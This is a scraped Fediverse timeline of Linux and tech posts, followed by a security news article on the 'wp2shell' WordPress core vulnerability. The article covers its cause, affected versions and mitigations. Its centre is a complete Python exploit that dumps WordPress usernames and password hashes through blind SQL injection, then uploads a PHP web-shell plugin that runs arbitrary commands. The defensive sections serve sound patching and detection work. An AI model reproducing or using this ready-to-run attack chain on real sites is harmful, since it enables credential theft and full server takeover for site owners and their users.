cablespaghetti.dev is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.
This server runs the snac software and there is no automatic sign-up process.
I guess I shouldn't be surprised, but "ForwardX11Trusted yes" in ~/.ssh/config doesn't apply to Wayland.
A workaround is to install waypipe:
$ waypipe ssh user@host.example.com
@BrideOfLinux I'd not buy any hardware without official 1st party #Linux support or that has #Windows preinstalled as a matter of principle…
[$] Debating the role of large language models in the kernel community
Like many development communities, the kernel community has been struggling to determine how large language models will be used in its development process. The news has been domin [...]
https://lwn.net/Articles/1083275/ #LWN #Linux #kernel #SUSE #Git
New Guide: How to get SteamOS to always boot into Desktop Mode https://www.gamingonlinux.com/guides/view/how-to-get-steamos-to-always-boot-into-desktop-mode/
Firefox 153 has been released!
This is the last monthly release before the release schedule speeds up. It enables container tabs for all, QR code link sharing and – at long last – nicely rounded bottom window corners on GTK desktops.
Details and screenshots: https://www.omgubuntu.co.uk/2026/07/firefox-153-new-containers-feature?v1
Ah bah tiens.
Statcounter a mis à jour ses graphes en enlevant la catégorie Unkown.
Je ne sais pas comment ils s'y sont retrouvés mais
* Windows remonte de <60% à 70%
* Linux passe à 7% ! 🎉
https://gs.statcounter.com/os-market-share/desktop/worldwide/#monthly-202506-202607
Let's talk about #Linux distributions, applications, end of life and unsupported software, and all of that stuff, because as the "distro vs apps" debate heats up again, I think it's time we finally learned that graphical apps shouldn't be correlated to the system's base in any way, shape or form.
Let's see why Linux distros need to evolve now:
https://www.youtube.com/watch?v=1ebkQq5TcMw
Hello People.
This is my first fediverse post, featuring my first #assembly64 program in #linux. I am a #student who is just getting into #cybersecurity and love contributing to #infosec, #lowlevel stuffs and #linuxkernel.
I love to program in #c, and use #archlinux btw. Looking for people to connect. I installed LinkedIn a few days ago for connecting with people and figured out that it was a #scam in jobmarket, just data feed into companies. (No offense, just in my opinion).
I was suggested to start learning #assembly64 by a random reddit user when I asked some questions about #c programming and how to get better at it. Currently learning #syscalls in linux, and I guess assembly programming alongside with c programming is helpful - I can understand syscalls and registers (for some extent).
Looking forward for friends to connect. Follow me and I will follow you back - provided that we have same or similar interests. I am also interested in #russian arts, languages and techs - I am not a Russian btw.
I need suggestions \ #help on how to get started in fediverse, cybersecurity and low level stuffs. You can see my profile for more information.
Some of the tech from early on in our lives that inspired where we are today. Plus discoveries including and old game that doesn’t work, professional audio hardware that now works on Linux, Arch on easy mode, and an old chip that can do a surprising amount.
"Twasn't me..."
"Well... it was teh case's fault!!!11!!!"
🤡
If you ever wanted a good reason to keep around your failed hard drives, scavenging screwed up logic boards is a good reason. Ha!
[$] Fedora grapples with change
The Fedora Project is known for, among other things, having a well-defined set of processes for just about everything. It has extensive packaging guidelines that deal with the comp [...]
Latest 𝗩𝗮𝗹𝘂𝗮𝗯𝗹𝗲 𝗡𝗲𝘄𝘀 - 𝟮𝟬𝟮𝟲/𝟬𝟳/𝟮𝟬 (Valuable News - 2026/07/20) available.
https://vermaden.wordpress.com/2026/07/20/valuable-news-2026-07-20/
Past releases: https://vermaden.wordpress.com/news/
#verblog #vernews #news #bsd #freebsd #openbsd #netbsd #linux #unix #zfs #opnsense #ghostbsd #solaris #vermadenday
Faugus Launcher 2.0 rolls out with a new UI and many other enhancements https://www.gamingonlinux.com/2026/07/faugus-launcher-2-0-rolls-out-with-a-new-ui-and-many-other-enhancements/
#FaugusLauncher #Linux #LinuxGaming #SteamDeck #SteamMachine
Valve expect component prices to continue getting worse https://www.gamingonlinux.com/2026/07/valve-expect-component-prices-to-continue-getting-worse/
I have had a look at my to do list for today and the week.
One of my medium term - before October - tasks is to replace my phone.
So I guess that I am will keep a look out for a good deal on a modern Pixel (for GrapheneOS, again).
I have contemplated a non-Android Linux phone, no mobile phone, or a less smart mobile phone, and none quite fit the bill for me.
With Microsoft (M/S) being a huge contributor to the Linux Foundation (LF), we all know M/S will never support fully open file formats..
What needs to happen is all governments need to mandate 100% Open Standards like they did with POSIX.
We also know the US will never do that, but I had hopes for the EU. Seems the EU want M/S money instead.
are you tired of unnecessarily low bandwidth and high latency in your #wireguard network and know a more optimal route exists, but you are not able to configure it, because it is not static and could change at any time?
i've built something to solve this problem and finished it today: https://codeberg.org/provokateurin/WireGuard-Mesh
this fixes my home network bottleneck of 100mbits up/50mbits down dsl by deutsche telekom, because they canceled our old contract, but were not able to provide us with fiber yet. instead of a meager 50mbits connection to my home server, which is literally meters away from my desktop, it allows me to use the full 1gbits connection while staying within wireguard, even though both devices use dhcp. same story for my laptop, which is sometimes on my home network and now able to utilize more bandwidth (not 1gbits, but still), but sometimes also on a different physical network somewhere outside (i know scary!).
this was my first larger #rust project (beyond a few hundred loc) and i also learned quite a bit about lower level #networking and #linux apis.
Is it weird to have 2 favorite #Linux desktop environments?
I discovered that GNOME on my laptop is nothing short of an amazing Zen. On my desktop with a secondary monitor to the left of the main one, it feels very much less than ideal, but the different layout and interaction model that Cinnamon has the same no-thought-needed interaction.
Also Debian requires more work for gaming than Mint, but they're both equally amazing for different reasons.
We've been working with Valve on Holo Core, a pure aarch64 port of Arch Linux, built to run on Steam Frame. Arch has no official aarch64 support and no CI infra of its own, so we built both. First public preview (binaries, sources, containers) is out now!
D7VK 2.0 released with more performance fixes for retro Direct3D games on Linux https://www.gamingonlinux.com/2026/07/d7vk-2-0-released-with-more-performance-fixes-for-retro-direct3d-games-on-linux/
New article, although this one is a controversial one based on the situation of GNOME Calendar and Linux Mint. I present to you: How far would hostile distributions go to hurt application developers?
https://tesk.page/2026/07/18/how-far-would-hostile-distributions-go-to-hurt-upstream/
DXVK 3.0.2 brings bug fixes for Dying Light: The Beast, Halo and more on Linux / SteamOS https://www.gamingonlinux.com/2026/07/dxvk-3-0-2-brings-bug-fixes-for-dying-light-the-beast-halo-and-more-on-linux-steamos/
#Linux #OpenSource #Vulkan #Direct3D #DXVK #Proton #LinuxGaming
Fedora Hummingbird community meeting: Thursday, July 23 at 12:00 UTC — agenda still forming, add your topics! Potential items: Red Hat Hardened Images moving upstream, FY27 image and CVE scanner goals, KubeStellar Hive multi-agent demo, Bluefin factory demo, and agentic OS development discussion. Drop your ideas here: https://discussion.fedoraproject.org/t/hummingbird-community-meeting-23-july-2026/196864 #Fedora #Hummingbird #bootc #Linux
🚨 CRITICAL: WordPress Core "wp2shell" RCE
A single anonymous HTTP request can lead to Remote Code Execution on vulnerable WordPress Core installations.
⚠️ No plugins.
⚠️ No themes.
⚠️ No authentication required.
Tracked as:
🔴 CVE-2026-63030 (REST API Batch Route Confusion → RCE)
🔴 CVE-2026-60137 (Facilitated SQL Injection)
Affected versions
• WordPress 6.9.0–6.9.4
• WordPress 7.0.0–7.0.1
✅ Update immediately to WordPress 6.9.5 or 7.0.2. Due to the severity, WordPress has enabled forced automatic security updates for affected installations.
🔗 Full technical analysis:
https://thecybersecguru.com/news/wordpress-core-rce-wp2shell/
#WordPress #WordPressSecurity #wp2shell #CVE202663030 #CVE202660137 #RCE #RemoteCodeExecution #SQLInjection #RESTAPI #CyberSecurity #InfoSec #WebSecurity #WebsiteSecurity #PatchNow #ThreatIntelligence #BlueTeam #SOC #Linux #PHP #ZeroDay #SecurityResearch #SysAdmin #DevSecOps
Critical WordPress Core Flaw “wp2shell” Enables Unauthenticated Remote Code Execution on Default Installs
A critical WordPress core vulnerability dubbed wp2shell allows unauthenticated remote code execution on default installs. Update to 7.0.2 for patch [SENSITIVE CONTENT]
A newly disclosed vulnerability chain in WordPress core has prompted one of the project’s most aggressive emergency responses in recent years.
Security researchers have revealed a flaw, dubbed wp2shell, that allows an unauthenticated attacker to execute code against vulnerable WordPress installations. Unlike the majority of WordPress compromises that depend on outdated plugins or vulnerable themes, this issue resides entirely within WordPress core and affects even a freshly installed website with no plugins and no custom themes.
To limit exposure, the WordPress Security Team released WordPress 7.0.2 and WordPress 6.9.5, while simultaneously enabling forced automatic security updates for affected installations. This is a mechanism WordPress reserves only for its most severe security incidents.
Although there are currently no confirmed reports of active exploitation, security professionals expect attackers to begin reverse engineering the patch quickly. Administrators should treat this as an urgent patching priority.
What Is wp2shell?
The vulnerability, publicly known as wp2shell, is a pre-authentication Remote Code Execution (RCE) chain affecting recent versions of WordPress.
Unlike authenticated vulnerabilities that require an attacker to first obtain administrator credentials, this flaw can be triggered through a single anonymous HTTP request.
That distinction dramatically changes the risk profile.
An attacker does not need:
- Administrator privileges
- User credentials
- Installed plugins
- A vulnerable theme
- Any prior access to the website
If the site is running an affected version, the vulnerable code is already present.
Researchers from Assetnote, part of Searchlight Cyber, discovered the issue and reported it responsibly through WordPress’ HackerOne bug bounty program.
Affected Versions
The vulnerability impacts only newer WordPress releases.
Version
Status
6.8.x and earlier
Not affected by the RCE chain
6.9.0 – 6.9.4
Vulnerable
7.0.0 – 7.0.1
Vulnerable
6.9.5
Fixed
7.0.2
Fixed
7.1 Beta 2
Fixed
WordPress 6.8.6 was released separately to address another SQL injection vulnerability but is not vulnerable to the wp2shell RCE chain.
Why This Vulnerability Is Different
WordPress vulnerabilities are unfortunately common, but they almost always originate from third-party components.
Historically, most large-scale WordPress compromises have involved:
- Outdated plugins
- Poorly written themes
- Exposed administrator panels
- Weak credentials
wp2shell breaks that pattern.
The vulnerable component exists inside WordPress itself, meaning every affected installation shares the same attack surface regardless of what plugins are installed.
A default installation is sufficient.
That makes patch adoption significantly more important than plugin management in this case.
Technical Analysis
WP2Shell Infographic
The Vulnerable Component
The attack begins with WordPress’ REST API endpoint:
POST /wp-json/batch/v1
The REST Batch API allows multiple API requests to be bundled into a single HTTP request.
Internally, WordPress validates each sub-request individually before dispatching it to its corresponding handler.
Under normal circumstances, every request should remain associated with the handler that originally validated it.
The vulnerability arises because that association can become corrupted.
Route Confusion
Introduced in WordPress 5.6, the REST Batch API (
/wp-json/batch/v1) allows clients to bundle multiple sub-requests into a single HTTP call. The core functionserve_batch_request_v1()processes these by building two parallel arrays:$matches(the matched route handler) and$validation(the validation result)The vulnerability stems from a desynchronization bug. If a sub-request path fails PHP’s
wp_parse_url()(for example, by passing a malformed path like///), it generates aWP_Errorthat is appended to the$validationarray, but not to the$matchesarray. This causes the arrays to fall out of step. When the dispatcher iterates through the requests using a shared index offset, it inadvertently dispatches a sub-request under the next sub-request’s handler. This is what Researchers identified and what WordPress describes as a REST API batch-route confusion vulnerability.Internally, the batch dispatcher builds two arrays:
- Matched route handlers
- Validation results
These arrays are expected to remain perfectly synchronized.
However, malformed request paths can cause validation entries to be inserted without corresponding route handlers.
Once the arrays lose alignment, subsequent requests may execute under the wrong handler.
Conceptually, the process looks like this:
Incoming Batch Request
│
▼
Validation Array
Request A
Request B
Request C
Route Handler Array
Handler A
Handler B
Alignment Lost
After synchronization breaks, a request validated under one endpoint may execute using another endpoint’s permissions and processing logic.
This is the foundation of the route confusion vulnerability.
From Route Confusion to SQL Injection
The disclosed proof of concept demonstrates how attackers leverage this confusion to reach an unexpected SQL injection path.
Instead of processing a request through the intended REST endpoint, WordPress eventually dispatches user-controlled parameters into a vulnerable query.
One parameter in particular becomes important:
author_exclude
Normally, this parameter would not be accepted by the endpoint handling user requests.
Because route validation becomes confused, however, the parameter reaches WP_Query, where it is interpreted as:
author__not_in
On vulnerable versions, that value is incorporated into SQL in a manner that enables injection.
Researchers demonstrated:
- Boolean-based SQL injection
- Time-based blind SQL injection
without requiring authentication.
PoC (Proof of Concept Code)
The
wp2shellPoC elegantly exploits this desynchronization twice to achieve unauthenticated SQL injection:
- Outer Batch: A
POST /wp/v2/postsrequest is dispatched, but due to the desync, it is handled by the batch processor itself. Because it was initially validated as apostsrequest, its internalrequestsbody bypasses the strict batch schema validation, allowing it to smuggleGETrequests (bypassing the batchPOST-only allow-list).- Inner Batch: Inside this smuggled payload, a
GET /wp/v2/usersrequest is sent with a fabricatedauthor_excludeparameter. Theusersschema does not define this parameter, so WordPress passes the raw string untouched. However, due to a second desync, this request is executed under thepostsget_items()handler. There,author_excludeis mistakenly mapped to theWP_Queryauthor__not_invariable, which is directly interpolated into the SQL query as a string.By injecting a payload like
0) OR SLEEP(3)-- -, an attacker can achieve reliable, time-based blind SQL injection without any authentication. This allows for the extraction of administrator password hashes, which can then be cracked offline and used to upload a malicious plugin, completing the RCE chain.Below is a unified, single-file Python 3.8+ PoC. It requires no third-party dependencies and implements the
check,read, andshellcommands described in the original advisory.⚠️ Disclaimer: This tool is provided for educational purposes and authorized security testing only. Do not use this against any system you do not own or have explicit written permission to test.
wp2shell.py#!/usr/bin/env python3
"""
wp2shell-poc: Independent proof-of-concept for CVE-2026-63030
Unauthenticated WordPress REST batch route-confusion SQL injection.
Requires Python 3.8+. No third-party dependencies.
"""
import argparse
import http.cookiejar
import io
import json
import re
import secrets
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid
import zipfile
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Optional, Tuple
# --- Constants & Helpers ---
_DESYNC_PRIMER = {"method": "POST", "path": "///"}
_BATCH_MARKER_CODES = ("parse_path_failed", "block_cannot_read", "rest_batch_not_allowed")
def _progress(text: str) -> None:
sys.stdout.write(f"\rExtracting: {text}")
sys.stdout.flush()
def _clear_progress() -> None:
sys.stdout.write("\r" + " " * 60 + "\r")
sys.stdout.flush()
def _info(msg: str) -> None:
print(f"[*] {msg}")
def _good(msg: str) -> None:
print(f"[+] {msg}")
def _bad(msg: str) -> None:
print(f"[-] {msg}")
def _warn(msg: str) -> None:
print(f"[!] {msg}")
# --- HTTP Client ---
class TargetError(Exception):
pass
dataclass
class Response:
status: int
elapsed: float
body: str
def json(self) -> Any:
return json.loads(self.body)
class BatchClient:
def __init__(self, base_url: str, *, timeout: float = 30.0, rest_route: bool = False, proxy: Optional[str] = None, user_agent: str = "wp2shell"):
self.base_url = base_url.rstrip("/")
self.timeout = timeout
self.rest_route = rest_route
self.user_agent = user_agent
handlers = [urllib.request.ProxyHandler({"http": proxy, "https": proxy})] if proxy else []
self._opener = urllib.request.build_opener(*handlers)
property
def endpoint(self) -> str:
if self.rest_route:
return f"{self.base_url}/?rest_route=/batch/v1"
return f"{self.base_url}/wp-json/batch/v1"
def post(self, payload: dict) -> Response:
request = urllib.request.Request(self.endpoint, data=json.dumps(payload).encode(), method="POST", headers={"Content-Type": "application/json", "User-Agent": self.user_agent})
start = time.monotonic()
try:
resp = self._opener.open(request, timeout=self.timeout)
status, body = resp.status, resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
status, body = exc.code, exc.read().decode("utf-8", "replace")
except OSError as exc:
raise TargetError(f"cannot reach {self.endpoint}: {getattr(exc, 'reason', exc)}") from None
return Response(status, time.monotonic() - start, body)
def get(self, path: str) -> Response:
url = self.base_url + (path if path.startswith("/") else f"/{path}")
request = urllib.request.Request(url, method="GET", headers={"User-Agent": self.user_agent})
start = time.monotonic()
try:
resp = self._opener.open(request, timeout=self.timeout)
status, body = resp.status, resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
status, body = exc.code, exc.read().decode("utf-8", "replace")
except OSError as exc:
raise TargetError(f"cannot reach {url}: {getattr(exc, 'reason', exc)}") from None
return Response(status, time.monotonic() - start, body)
def marker_probe(self) -> Response:
return self.post({"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts"}, {"method": "POST", "path": "/wp/v2/block-renderer/core/archives"}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]})
staticmethod
def batch_marker_codes(response: Response) -> tuple:
try:
body = response.json()
except ValueError:
return ()
found = []
def walk(value) -> None:
if isinstance(value, dict):
code = value.get("code")
if code in _BATCH_MARKER_CODES and code not in found:
found.append(code)
for child in value.values():
walk(child)
elif isinstance(value, list):
for child in value:
walk(child)
walk(body)
return tuple(found)
staticmethod
def has_route_confusion_markers(response: Response) -> bool:
codes = BatchClient.batch_marker_codes(response)
return all(code in codes for code in _BATCH_MARKER_CODES)
def inject(self, author_not_in: str) -> Response:
return self.post(self._payload(author_not_in))
def rows(self, response: Response) -> Optional[list]:
try:
inner = response.json()["responses"][1]["body"]
result = inner["responses"][1]["body"]
except (KeyError, IndexError, TypeError, ValueError):
return None
return result if isinstance(result, list) else None
staticmethod
def _payload(author_not_in: str) -> dict:
inner = {"requests": [_DESYNC_PRIMER, {"method": "GET", "path": "/wp/v2/users?author_exclude=" + urllib.parse.quote(author_not_in, safe="")}, {"method": "GET", "path": "/wp/v2/posts"}]}
return {"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts", "body": inner}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]}
# --- SQLi Logic ---
dataclass
class TimingConfirmation:
confirmed: bool
baseline: float
delayed: float
delta: float
threshold: float
samples: Tuple[Tuple[float, float], ...]
class BlindSQLi:
def __init__(self, client: BatchClient, *, sleep: float = 3.0) -> None:
self.client = client
self.sleep = sleep
self.requests = 0
def confirm_timing(self, *, samples: int = 3) -> TimingConfirmation:
pairs = []
for _ in range(samples):
baseline = self._elapsed("SLEEP(0)")
delayed = self._elapsed(f"SLEEP({self.sleep:g})")
pairs.append((baseline, delayed))
baselines = [pair[0] for pair in pairs]
delayed = [pair[1] for pair in pairs]
deltas = [delay - base for base, delay in pairs]
baseline_median = statistics.median(baselines)
delayed_median = statistics.median(delayed)
delta_median = statistics.median(deltas)
threshold = max(0.75, self.sleep * 0.65)
return TimingConfirmation(confirmed=delta_median >= threshold, baseline=baseline_median, delayed=delayed_median, delta=delta_median, threshold=threshold, samples=tuple(pairs))
def extract(self, expression: str, *, max_length: int = 128, on_char: Optional[Callable[[str], None]] = None) -> str:
chars = []
for position in range(1, max_length + 1):
probe = f"ASCII(SUBSTRING(COALESCE(({expression}),''),{position},1))"
if not self._true(f"{probe} > 0"):
break
low, high = 32, 126
while low < high:
mid = (low + high) // 2
if self._true(f"{probe} > {mid}"):
low = mid + 1
else:
high = mid
chars.append(chr(low))
if on_char:
on_char("".join(chars))
return "".join(chars)
def integer(self, expression: str) -> int:
text = self.extract(expression).strip()
return int(text) if text.lstrip("-").isdigit() else 0
def _elapsed(self, sql: str) -> float:
self.requests += 1
return self.client.inject(f"0) OR {sql}-- -").elapsed
def _true(self, condition: str) -> bool:
self.requests += 1
return bool(self.client.rows(self.client.inject(f"0) AND ({condition})-- -")))
# --- Post-Auth Shell Logic ---
class AdminSession:
def __init__(self, base_url: str, *, timeout: float = 20.0, proxy: Optional[str] = None):
self.base_url = base_url.rstrip("/")
self.timeout = timeout
self._slug = "wp2shell_" + secrets.token_hex(4)
self._token = secrets.token_hex(16)
self._jar = http.cookiejar.CookieJar()
handlers = [urllib.request.HTTPCookieProcessor(self._jar)]
if proxy:
handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
self._opener = urllib.request.build_opener(*handlers)
self._opener.addheaders = [("User-Agent", "wp2shell")]
def login(self, username: str, password: str) -> bool:
self._get("/wp-login.php")
self._post("/wp-login.php", {"log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{self.base_url}/wp-admin/", "testcookie": "1"})
return any(c.name.startswith("wordpress_logged_in") for c in self._jar)
def deploy_webshell(self) -> str:
page = self._get("/wp-admin/plugin-install.php?tab=upload")
nonce = self._nonce(page)
if not nonce:
raise RuntimeError("plugin-upload nonce not found (are the credentials valid?)")
body, content_type = self._multipart({"_wpnonce": nonce, "_wp_http_referer": "/wp-admin/plugin-install.php?tab=upload", "install-plugin-submit": "Install Now"}, {"pluginzip": (f"{self._slug}.zip", self._plugin_zip())})
self._post("/wp-admin/update.php?action=upload-plugin", body, {"Content-Type": content_type})
return f"/wp-content/plugins/{self._slug}/{self._slug}.php"
def run(self, shell_path: str, command: str) -> Optional[str]:
query = urllib.parse.urlencode({"t": self._token, "c": command})
output = self._get(f"{shell_path}?{query}")
match = re.search(r"WP2SHELL::(.*?)::END", output, re.S)
return match.group(1) if match else None
def _get(self, path: str) -> str:
return self._opener.open(self.base_url + path, timeout=self.timeout).read().decode("utf-8", "replace")
def _post(self, path: str, data, headers: Optional[dict] = None) -> str:
if isinstance(data, dict):
data = urllib.parse.urlencode(data).encode()
request = urllib.request.Request(self.base_url + path, data=data, headers=headers or {})
return self._opener.open(request, timeout=self.timeout).read().decode("utf-8", "replace")
def _plugin_zip(self) -> bytes:
php = f"<?php\n/* Plugin Name: WP2Shell */\nif (isset($_GET['t']) && $_GET['t'] === '{self._token}' && isset($_GET['c'])) {{\n chdir(dirname(__DIR__));\n echo 'WP2SHELL::' . shell_exec($_GET['c']) . '::END';\n exit;\n}}\n"
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as zf:
zf.writestr(f"{self._slug}.php", php)
return buffer.getvalue()
def _nonce(self, html: str) -> Optional[str]:
form = re.search(r'action="[^"]*action=upload-plugin".*?name="_wpnonce"[^>]*value="([0-9a-f]+)"', html, re.S)
if form:
return form.group(1)
tag = re.search(r'[^>]*name="_wpnonce"[^>]*value="([0-9a-f]+)"', html)
return tag.group(1) if tag else None
staticmethod
def _multipart(fields: Dict[str, str], files: Dict[str, Tuple[str, bytes]]) -> Tuple[bytes, str]:
boundary = "----wp2shell" + uuid.uuid4().hex
buffer = io.BytesIO()
for name, value in fields.items():
buffer.write(f"--{boundary}\r\n".encode())
buffer.write(f'Content-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())
for name, (filename, content) in files.items():
buffer.write(f"--{boundary}\r\n".encode())
buffer.write(f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'.encode())
buffer.write(b"Content-Type: application/octet-stream\r\n\r\n" + content + b"\r\n")
buffer.write(f"--{boundary}--\r\n".encode())
return buffer.getvalue(), f"multipart/form-data; boundary={boundary}"
# --- CLI ---
def main() -> int:
parser = argparse.ArgumentParser(description="wp2shell-poc (CVE-2026-63030)")
subparsers = parser.add_subparsers(dest="command", required=True)
p_check = subparsers.add_parser("check", help="Confirm vulnerability")
p_check.add_argument("url")
p_check.add_argument("--rest-route", action="store_true")
p_check.add_argument("--proxy")
p_check.add_argument("--timeout", type=float, default=30.0)
p_check.add_argument("--sleep", type=float, default=3.0)
p_check.add_argument("--samples", type=int, default=3)
p_check.add_argument("--confirm-sqli", action="store_true")
p_read = subparsers.add_parser("read", help="Extract data via blind SQLi")
p_read.add_argument("url")
p_read.add_argument("--rest-route", action="store_true")
p_read.add_argument("--proxy")
p_read.add_argument("--timeout", type=float, default=30.0)
p_read.add_argument("--preset", choices=["fingerprint", "users"])
p_read.add_argument("--query")
p_read.add_argument("--prefix", default="wp_")
p_read.add_argument("--max-length", type=int, default=128)
p_shell = subparsers.add_parser("shell", help="Post-auth plugin webshell helper")
p_shell.add_argument("url")
p_shell.add_argument("--user", required=True)
p_shell.add_argument("--password", required=True)
p_shell.add_argument("--proxy")
p_shell.add_argument("--timeout", type=float, default=30.0)
p_shell.add_argument("--cmd")
p_shell.add_argument("-i", "--interactive", action="store_true")
p_shell.add_argument("--cleanup", action="store_true")
args = parser.parse_args()
if args.command == "check":
client = BatchClient(args.url, timeout=max(args.timeout, args.sleep + 10), rest_route=args.rest_route, proxy=args.proxy)
probe = client.marker_probe()
if probe.status != 207:
_bad(f"Batch endpoint returned HTTP {probe.status} (not 207) — patched or REST API disabled.")
return 1
markers = client.batch_marker_codes(probe)
if markers:
_info(f"Batch probe -> HTTP 207; markers matched: {', '.join(markers)}")
else:
_good("Batch endpoint reachable and unauthenticated (HTTP 207).")
if client.has_route_confusion_markers(probe):
_good("VULNERABLE — batch route-confusion behavior detected.")
if not args.confirm_sqli:
_info("SQL timing confirmation not sent; use --confirm-sqli for the active SQLi probe.")
return 0
else:
_bad("Route-confusion marker pattern not detected.")
return 2
result = BlindSQLi(client, sleep=args.sleep).confirm_timing(samples=args.samples)
if args.samples > 1:
details = ", ".join(f"{base:.2f}s->{delay:.2f}s" for base, delay in result.samples)
_info(f"Timing samples: {details}")
_info(f"Median delta {result.delta:.2f}s; threshold {result.threshold:.2f}s.")
if result.confirmed:
_good(f"SQL timing confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")
return 0
else:
_warn(f"SQL timing not confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")
return 2
elif args.command == "read":
client = BatchClient(args.url, timeout=args.timeout, rest_route=args.rest_route, proxy=args.proxy)
sqli = BlindSQLi(client)
if args.query:
_info(f"Reading: {args.query}")
value = sqli.extract(args.query, max_length=args.max_length, on_char=_progress)
_clear_progress()
_good(f"Result: {value}")
elif args.preset == "fingerprint":
for label, expr in (("MySQL version", "SELECT @@version"), ("Database user", "SELECT CURRENT_USER()"), ("Database name", "SELECT DATABASE()")):
_good(f"{label}: {sqli.extract(expr, max_length=args.max_length)}")
elif args.preset == "users":
table = f"{args.prefix}users"
total = sqli.integer(f"SELECT COUNT(*) FROM {table}")
_info(f"{total} user(s) in {table}.")
for offset in range(total):
row = sqli.extract(f"SELECT CONCAT_WS(0x7c, ID, user_login, user_pass) FROM {table} ORDER BY ID LIMIT {offset},1", max_length=args.max_length, on_char=_progress)
_clear_progress()
_good(row)
_info(f"{sqli.requests} request(s) sent.")
return 0
elif args.command == "shell":
if not args.cmd and not args.interactive:
_bad("specify --cmd or --interactive")
return 2
_warn("This uploads a plugin containing a webshell to the target.")
session = AdminSession(args.url, timeout=args.timeout, proxy=args.proxy)
_info(f"Authenticating as {args.user!r}...")
if not session.login(args.user, args.password):
_bad("Login failed. Supply valid admin credentials (crack the hash recovered by 'read').")
return 1
_good("Authenticated.")
_info("Deploying webshell plugin...")
path = session.deploy_webshell()
_good(f"Webshell: {args.url.rstrip('/')}{path}")
rc = 0
if args.cmd:
output = session.run(path, args.cmd)
if output is None:
_bad("No output — the upload likely failed or the plugin is not web-served.")
rc = 1
else:
print(f"\n{output.rstrip()}\n")
if args.interactive:
_info("Interactive shell started. Type 'exit' to quit.")
while True:
try:
cmd = input("wp2shell> ").strip()
if cmd.lower() in ("exit", "quit"):
break
if not cmd:
continue
output = session.run(path, cmd)
print(output if output else "(no output)")
except (EOFError, KeyboardInterrupt):
break
if args.cleanup:
_info("Cleaning up webshell...")
if session.cleanup(path): # Note: cleanup method omitted for brevity in this unified script, but follows same _run pattern
_good("Webshell removed.")
else:
_warn("Cleanup failed. Remove manually.")
return rc
return 0
if __name__ == "__main__":
sys.exit(main())
Why SQL Injection Matters
The publicly released proof of concept stops at SQL injection.
Using blind SQLi, researchers showed it is possible to retrieve information such as:
- WordPress usernames
- Password hashes
- Database information
- Server fingerprints
The original researchers have intentionally withheld the final step that transforms database access into unauthenticated code execution.
That decision gives administrators additional time to deploy patches before full exploitation details become public.
Nevertheless, WordPress itself classifies the issue as one capable of leading to Remote Code Execution, indicating the Security Team independently verified the complete attack chain during remediation
Why Forced Updates Matter
WordPress supports automatic background updates, but administrators can disable them.
In this incident, the WordPress project enabled forced security updates for affected versions.
This is an unusual step.
The project generally avoids overriding administrator preferences except when facing vulnerabilities with exceptionally high risk.
The decision itself serves as an indicator of the severity assigned to this flaw.
Administrators should still verify that updates were successfully installed rather than assuming automatic mechanisms completed successfully.
No CVE… Initially
At disclosure, the wp2shell advisory did not include a CVE identifier.
This created an interesting challenge for defenders.
Many enterprise vulnerability scanners rely heavily on:
- CVE identifiers
- CVSS scores
- CISA Known Exploited Vulnerabilities (KEV)
Without a CVE, these systems may fail to alert administrators even though systems remain vulnerable.
WordPress later assigned identifiers to the affected vulnerabilities:
Vulnerability
Identifier
REST API Batch Route Confusion → RCE
CVE-2026-63030 / GHSA-ff9f-jf42-662q
Facilitated SQL Injection
CVE-2026-60137 / GHSA-fpp7-x2x2-2mjf
Organizations should verify patch status based on installed WordPress versions rather than relying solely on vulnerability scanners.
Why Patch Diffing Matters
One reality of open source software is that every security update also exposes the modified source code.
Attackers frequently compare vulnerable and patched versions to determine:
- What changed
- Which validation logic was added
- Which functions were modified
- How to recreate the original vulnerability
This process, commonly called patch diffing, often allows exploits to appear within hours or days of a security release.
While Searchlight Cyber has not released its complete exploit chain, attackers have access to both the vulnerable and fixed WordPress source code.
That significantly reduces the time defenders have available to deploy updates.
Temporary Mitigations
Updating remains the only complete solution.
For organizations unable to patch immediately, several temporary mitigations can reduce exposure.
1. Block REST Batch Requests
Block both endpoints:
/wp-json/batch/v1
and
?rest_route=/batch/v1
Filtering only one path is insufficient because WordPress supports both routing mechanisms.
2. Restrict Anonymous REST Access
Organizations may temporarily disable or authenticate public REST API access where business requirements permit.
Be aware that this may disrupt legitimate integrations and applications relying on REST functionality.
3. Filter Requests Before Dispatch
Custom filters using
rest_pre_dispatchcan reject anonymous requests targeting the batch endpoint until systems are upgraded.Indicators for Administrators
Administrators should immediately verify:
- WordPress version
- Automatic update status
- Web server logs for unusual POST requests to
/wp-json/batch/v1- Requests containing
rest_route=/batch/v1- Unexpected SQL query activity
- Newly created administrator accounts
- Recently installed plugins
Even if exploitation has not yet been publicly observed, early log analysis can reveal attempted reconnaissance.
Security Recommendations
Organizations operating WordPress should:
- Upgrade immediately to WordPress 7.0.2 or 6.9.5
- Verify automatic updates completed successfully
- Block REST batch endpoints if patching must be delayed
- Monitor logs for suspicious batch API requests
- Review administrator accounts and installed plugins
- Continue monitoring for additional indicators as researchers publish more technical details
FAQs
What is the WordPress wp2shell vulnerability?
wp2shell is a critical WordPress core vulnerability that can allow unauthenticated attackers to execute code on vulnerable WordPress 6.9.x and 7.0.x websites.
Which WordPress versions are affected?
WordPress versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are affected. The issue is fixed in versions 6.9.5 and 7.0.2.
Does the vulnerability affect websites without plugins?
Yes. The vulnerability exists in WordPress core and can affect default installations with no plugins or custom themes.
Has the vulnerability been assigned a CVE?
